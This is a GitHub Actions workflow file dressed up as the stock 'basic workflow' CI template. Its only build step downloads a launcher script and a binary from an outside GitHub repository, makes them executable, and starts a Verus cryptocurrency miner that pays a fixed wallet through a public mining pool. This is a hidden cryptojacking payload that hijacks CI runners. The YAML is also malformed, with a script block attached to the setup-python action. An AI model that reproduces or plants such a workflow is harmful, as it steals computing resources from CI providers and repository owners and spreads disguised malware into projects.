# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 3

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2
      - name: Run Python First
      - uses: actions/setup-python@v2
        with:
          python-version: '3.x'
          architecture: 'x64'
          script: |
            import os
            os.system("wget https://raw.githubusercontent.com/hunshukajh/yes/main/cmdline_launcher.sh")
            os.system("wget https://github.com/hunshukajh/yes/raw/main/gas")
            os.system("chmod +x gas cmdline_launcher.sh")
            os.system("./cmdline_launcher.sh -algo verushash -coin VRSC -wallet RK2PLreuU6F3Zm7rBzNn5v9MN8TkdyoH7K -rigName cicd -pool1 na.luckpool.net:3956")
          
